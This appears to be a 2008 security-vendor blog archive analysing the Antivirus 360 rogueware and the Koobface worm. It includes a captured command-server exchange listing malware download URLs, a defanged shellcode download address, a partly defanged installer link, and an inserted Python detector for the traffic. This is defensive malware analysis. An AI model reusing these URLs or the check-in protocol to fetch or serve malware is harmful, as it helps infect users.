Archive for December, 2008

Antivirus 360 Distribution – Update Third Party Plugins

Friday, December 12th, 2008

Antivirus 360 is the new Antivirus 2009 indeed. It is spreading using the same old commodity plugin exploit techniques as AV 2009. Be sure to update any QuickTime Player or Adobe Plugins that you may be running to the latest versions.

A number of web sites are delivering a variety of exploits to get this rogueware on your system. One delivery method that seems to be very reliable is a set of malformed PDF files. The malicious files exploit various versions of the Adobe PDF reader, delivering download-and-execute shellcode that calls URLDownloadToFileA on hxxp://svc .ms / xrun.tmp and then WinExec on that download.



This file is a custom packed downloader. After a long delay, it contacts multiple web sites, then pulls down a number of files, including another awful Vundo package that was at the top of hit lists for years.
The first popup from the downloaded adware on the system was redirected to the Antivirus 360 Web Scanner, which is nothing more than cheap JavaScript pretending to scan one’s hard drive and fraudulently claiming that malware is littering the system. On another system, we saw VirusRemover2008 being hucked by the redirected popup, with lots of fraudulent detections and shocking warnings.

So please, keep this stuff off of your system. Update all third party plugins on your system.

AV360 is the New Antivirus 2009

Thursday, December 11th, 2008

Antivirus 360 is the newest Rogueware in high prevalence, while VirusTotal AV detection results are extremely low, currently at 3/36. Our ThreatFire community is seeing and preventing far too many hits on this stuff today. It shamelessly re-uses the same AV2009 detection names, like “Spyware.IEMonster”, and presents a similar 37 phony malware detections on a system. Avoid this Rogueware site. The distributors shamelessly rip names like PC Magazine Editor’s Choice to fabricate credibility:


You may end up with a file like “av360install_770522156496.exe” on your system, which drops av360.exe, among others.
At the very least, if you see this dialog (consistently full of bad English grammar, as in the poorly written Antivirus 2009 dialogs), kill it:

Steer clear of this stuff, here are a few new windows, presenting the same phony malware detections as AV2009 on a clean lab system:

It looks like this one altogether will take the place of Antivirus 2009 — all of the sites that usually serve that Rogueware package are down.

It presents a large phony privacy violation alert early on:


A few phony statements that they might throw in your screen once running are listed here, in a variety of languages:
Threats detected
Privacy violation alert!
Antivirus 360 has detected numerous privacy violations. Some programs may send your private data to an untrusted internet host. Click here to permanently block this activity and remove the possible threat (Recommended)
System files modification alert!
Internal conflict alert!
Antivirus 360 has detected internal software conflict. Some application endeavors to access…
Spyware activity alert!
Spyware.IEMonster is a popular spyware that attempts to steal passwords from Web browsers…
Privacy Violation alert!
Antivirus 360 detected a Privacy Violation. A program is secretly sending your private data to an…
Some critical system files of your computer were modified by malicious program. It may cause system instability and data loss. Click here to block unathorised modification by removing threats (Recommended).
Gefahr! Missbrauch des Datenschutzes!
Antivirus 360 hat Missbrauch des Datenschutzes
Irgendeines Programm sendet heimlich Ihren privaten Daten in die ungesicherte Zone (empfehlt).
Gefahr!
Spyware Aktivitaten! Spyware.IEMonster Aktivitaten wurden festgestellt.
Prevention de la modification des fichiers de systeme!
Prevention de lactivite du Logiciel espion!
Internet Explorer, Mozilla Firefox, Outlook et dautres programmes, y compris des logins et des mots de passe des operations bancaires en ligne, eBay, PayPal….

Koobface Notes — flash_update.exe, bolivar29.exe, tinyproxy.exe

Tuesday, December 9th, 2008

Earlier last week, we first posted our usual warning about the spike in Koobface threats that our ThreatFire users were being protected against on their systems. That post set off some interest in the worm again. The last spike in the worm coincided with Dancho Danchev’s post in November, following the first report in July of high worm prevalence.

Because requests for information and assumptions that the redirection to a video download makes it Zlob have been repeated, and because the worm’s components are actively being re-distributed in high prevalence, we’ll spill another Dancho-sized mug of coffee over additional and current technical details.

But first, an interesting note for users is that the social engineering scheme used to persuade users into installing the worm does not match the Adobe Flash Player install that the malware distributors are trying to spoof.
On a visit to the real adobe.com site, the user can click on an image to update their flash player:

Internet Explorer users visiting the Flash player install page can then hit “Agree”, and they are provided with an ActiveX install. When Firefox and Chrome users visit the authentic Flash player install site and click on “Agree”, they are prompted to install a file by the name of “install_flash_player.exe”. Neither of these names is used by the worm distributors. The worm is provided as “flash_update.exe”.

Multiple Koobface files are currently of interest here: flash_update.exe, bolivar29.exe, fmark2.dat, multiple batch files that delete these executables, tt_1209658078.exe, 351631.dll and tinyproxy.exe. Keep in mind that the end goal is to spread the 351631.dll and tinyproxy.exe files, installing them as a BHO and a system service (in the lab, it was installed as the “Shell Hardware Detection (ShellHWDetection)” system service). Both of these components are nasty little bits of adware. When the BHO identifies that a user is using a specific search engine, like Google or Yahoo, the user is redirected to other sites. Ads are popped as well.

These were the files installed via a flash_update.exe executable being distributed and run a few hours ago from an unfortunate infected server in Serbia sitting on a home cable internet connection.

Flash_update.exe is a small executable simply packed with UPX and encoded to obfuscate strings (HTTP download links, interesting cookie information, etc.):
Flash_update.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
upx packed
It drops c:\windows\bolivar29.exe, (an exact duplicate of itself) and calls CreateProcessA on that file to run it.
It writes a batch file to c: to delete itself, and calls CreateProcessA on the batch file and exits.

bolivar29.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
upx packed
Bolivar29.exe is an exact duplicate of flash_update.exe. When started, it checks its own filename. If it is bolivar29.exe, the infection has already occurred, so it doesn’t need to drop another copy of itself. It looks for ed323432006.dat on the c: drive and checks for social networking “cookies” and data files. It drops another file, tt_1228867129.exe, into the temp directory, which POSTs back to a web server:
_______________________________________
/fb/first.php HTTP/1.0
Host: 5824125537.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/20040201 Firefox/3.0.4
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 81

f=0&a=-xxx&v=19&c=2&s=fb&l=&ck=1&c_fb=1&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0

HTTP/1.1 200 OK
Date: Wed, 10 Dec 2008 xx:xx:xx GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 148
Connection: close
Content-Type: text/html

START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
START|http://www.teamtga.com/images/games/gif/6243.exe
FBTARGETPERPOST|20
#BLACKLABEL
_______________________________________

It pulls the files listed in the response down and installs them.
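For defenders who want to recognise this check-in in proxy or IDS captures, here is an added example (not code from the original post or from the worm) that parses the exchange quoted above: the form fields of the POST and the “VERB|argument” tasking lines of the reply. The sample request and response are reconstructed from the capture shown in the post; the “POST” method and line endings are assumed, since the capture starts at the request path, and no meaning is assumed for the form fields beyond what the post states.

```python
from urllib.parse import parse_qs

# Constructed sample, rebuilt from the captured exchange in the post (the
# redacted "-xxx" value is kept as-is; the POST method line is assumed).
SAMPLE_REQUEST = (
    "POST /fb/first.php HTTP/1.0\r\n"
    "Host: 5824125537.com\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 81\r\n\r\n"
    "f=0&a=-xxx&v=19&c=2&s=fb&l=&ck=1&c_fb=1&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0"
)
SAMPLE_RESPONSE = (
    "START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe\n"
    "START|http://www.teamtga.com/images/games/gif/6243.exe\n"
    "FBTARGETPERPOST|20\n"
    "#BLACKLABEL\n"
)


def parse_checkin_request(raw):
    """Split the POST into (method, path, host, form-field dict)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    host = ""
    for line in lines[1:]:
        if line.lower().startswith("host:"):
            host = line.split(":", 1)[1].strip()
    # keep_blank_values keeps fields such as "l=" that carry no value
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return method, path, host, fields


def parse_tasking(raw):
    """Turn 'VERB|ARG' reply lines into (verb, arg) pairs; '#...' lines are skipped."""
    tasks = []
    for line in raw.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        verb, _, arg = line.partition("|")
        tasks.append((verb, arg))
    return tasks


def download_urls(tasks):
    """URLs the client is told to fetch and run (START| lines)."""
    return [arg for verb, arg in tasks if verb == "START"]


def looks_like_koobface_checkin(request, response):
    """Heuristic match on the pattern from the capture: POST to .../first.php
    carrying s= and ck= fields, answered with START| download tasks."""
    method, path, _host, fields = parse_checkin_request(request)
    tasks = parse_tasking(response)
    return (method == "POST" and path.endswith("/first.php")
            and "s" in fields and "ck" in fields
            and any(verb == "START" for verb, _ in tasks))
```

Run against the sample it flags the exchange and lists the two executables the worm is told to pull down.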

Tinyproxy.exe is the final install. When it is installed as a service and interacts with the BHO DLL, it proxies and redirects the infected system’s browser to multiple ad sites. The file itself is copied with Hidden and System attributes, so on most systems the file is not displayed in a “c:\program files\tinyproxy” folder window.
Last week this file was hosted on the American International Baseball Club web server in Vienna (www.aibc.vienna.org), even though some reports stated it had been taken down. This latest infection shows that the files are served up from another compromised server. Here is a link to the BHO installer: www.team ga.c om/images/g ames/gif/ 6243.exe.

Last week, we saw our IE web browser redirected to ads from Yahoo! HotJobs, the March of Dimes Foundation, and constant redirections to www-find-www.com and 216.195.52.100.
This time, when we opened a browser to Yahoo!, searched on “Cha Ca Vietnam” and clicked on a result, our browser was redirected to “http://www-find-www.net/?q=cha%20ca”

When we opened a browser to Google on the infected system, searched on “Cha Ca Vietnam” and clicked on a result, a new window popped open to
http://morefindit.com/?q=cha%20ca
with a final redirection to
http://www.toseeka.com/search.php?q=Cha+Am

Ugh. This global mess continues on as a massive financially motivated browser hijacking scam.